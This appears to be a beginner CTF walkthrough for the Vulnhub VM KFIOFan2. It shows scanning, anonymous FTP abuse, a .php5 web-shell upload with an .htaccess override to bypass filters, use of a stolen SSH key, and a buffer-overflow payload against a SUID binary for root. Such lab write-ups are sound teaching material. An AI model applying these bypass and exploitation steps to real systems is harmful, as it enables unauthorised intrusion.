CTF Challenges

CTF KFIOFan: 2 Vulnhub Walkthorugh

Today we are going to take on a new challenge KFIOFan2. The credit for making this VM machine goes to “Khaos Farbauti Ibn Oblivion” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here

Security Level: Beginner

Penetrating Methodology:

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • Enumerating ftp services

Exploitation

  • Uploading php shell to get ssh key

Privilege Escalation

  • Buffer Overflow to get sudo rights

Walkthrough:

Scanning:

First thing first, scan the vulnerable machine using nmap.

nmap -p- -A 192.168.1.33

Here we found that the only port open is port 26921

Let’s take a look at what the ftp service has to offer. The ssh banner gave us a message

“Salut Alice ! Suite a l’attaque sur notre precedent serveur, j’en prepare un nouveau qui sera bien plus securise ! C’est en travaux pour l’instant donc s’il te plait ne touche a rien pour l’instant… Bob”

Which translates to

“Hi Alice! Following the attack on our previous server, I prepare a new one that will be much more secure! It is under construction for now so please do not touch anything for now … Bob”

We found anonymous login here.  After logging in, we found 4 images and a directory named `serrure`. We downloaded the images and checked the directory but found nothing in the directory

After getting not much information but only 4 images, we tried to decipher the hint behind this so we tried to find any kind of stegnographical content. So we tried to get some kind of information from the images by another method. We combined the images together and found that the catch was very simple. In the centre of the combined image, we found a name of a file named as “cle.txt”.

We tried to find this file but did not find it anywhere. So we tried to do a little bit different step. We created a file with dummy content and put it into the target system through ftp

After putting the file in the serrure directory, we tried to scan the target system again. Looks like the cle.txt file worked as a key to unlock another port 26980 running http service

nmap -p- -A 192.168.1.33

Now that we have found one other port, we tried to enumerate the website  but the welcome message looked something like this

Tout ce qui est, est père du mensonge et fils du néant

Which translates into

All that is, is father of lies and sons of nothingness

While analysing the page source of the webpage, we found a comment something like this

<!– Test présence fichier cle.txt : OK –>

<!– Test contenu fichier cle.txt  : Erreur –>

Which translates into

<! – Test presence cle.txt file: OK ->

<! – Test content cle.txt file: Error ->

Indicating that the content of cle.txt file needs to be changed

Alongside this we tried to get more details about the target machine and found a directory named uploads, but with none content

Now to put the correct content in the cle.txt file, we tried to look for a meaning for the hint. After some research, we found an article written by the author of this lab. In this article we found that the hint is the description of the author’s nickname i.e. Khaos Farbauti Ibn Oblivion.

We used this name as the content of the cle.txt  and replace this file in the serrure directory through ftp

echo "Khaos Farbuti Ibn Oblivion" > cle.txt
ftp 192.168.1.33 26921
cd serure
delete cle.txt
put cle.txt

Now let’s check the webpage again. This time we found a file upload module in place, looks like the content of cle.txt file was being used to change the functioning of the webpage. Now all we need to do is upload a shell, first, we tried to upload a txt file and the was uploaded easily

Next, we tried uploading a php shell but was blocked

To bypass the security we tried to upload a .php5 shell and succeded

Now to verify that our shell is uploaded, we tried to check the uploads directory and found that our file is there

Now we tried to execute the shell but failed, after some attempts we thought that there might be a .htaccess  which might be blocking us from executing a php application. So to override that we needed to overwrite the previous one, we tried to create a blank .htaccess file and tried to upload that.

As we were able to upload the .htaccess file we tried to use the uploaded shell to run system commands and were able to do that.

After some searching, we found an ssh key

Now, all we need to find is an ssh port to connect. We did nmap scan again and this time we found an ssh port on 26922

nmap -p- -A 192.168.1.33

Now we have an ssh port and an ssh key, let’s try to combine them together and get an ssh connection. We saved the ssh key into a file named id_rsa, provided it 0600 permission and tried to use that key for connection. Once getting the connection we tried to find all the files with suid permissions and found that there is a file named test

chmod 0600 id_rsa
ssh bob@192.168.1.33 -p 26922 -i id_rsa
find / -perm –u=s –type f 2>/dev/null

When we tried to execute the file, it asked us for password and we don’t have any. We tried to check the strings in the file using the strings command and found some interesting things.

strings test

First, we found that there is a system function in use, meaning there is a system command being executed.

Second, we found a system command “touch /root/authorize_bob” indicating that this is the system command that we want to be executed

Third, we found a string “aliceestnulle” right below the password prompt “Mot de passe

We tried to run the file again with the password that we found and got a message

As we were not able to get anything even after entering the correct password, we tried to get details from gdb

gdb test
set disassembly-flavor intel
disassemble main
start

We started the execution of the program using the start command when the program asked for a password, we tried to discover buffer overflow vulnerability. We created an input string of length 50 using pattern_create.rb file from Metasploit-framework. ­

cd /usr/share/metasploitable-framework/tools/exploit
./pattern_create.rb -l  50

After putting the input we found that after certain length our input is put into an executable stack

Before going on multiple types of buffer overflow exploitation, we went to our previous findings just to check whether we have some other hints to follow, fortunately, we found that when we found the touch command in the strings command output, right above that there was a string having content as

lancement debug

when we translated this it resulted in

launch debug

when we tried to check the debug function, we found that there is a system function being executed inside the debug function.

disassemble debug

Next, we are left with the attempt to execute the debug function, so with took the length of the string which resulted in a buffer overflow, and replaced the characters which were stored in the executable stack with the address of the debug function.

python -c 'print ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6"+"\x20\x48\x55\x55\x55\x55")' | ./test

After running the same input for multiple attempts, we logged out of the ssh session and reconnected and tried sudo command and it worked.

ssh bob@192.168.1.33 -p 26922 -i id_rsa
sudo su

Let’s capture the flag and get finished with the CTF

cd /root
cat flag.txt

Author:Deepanshu is a Certified Ethical Hacker, Security Researcher, Pentester and Trainer at Ignite Technologies. Contact here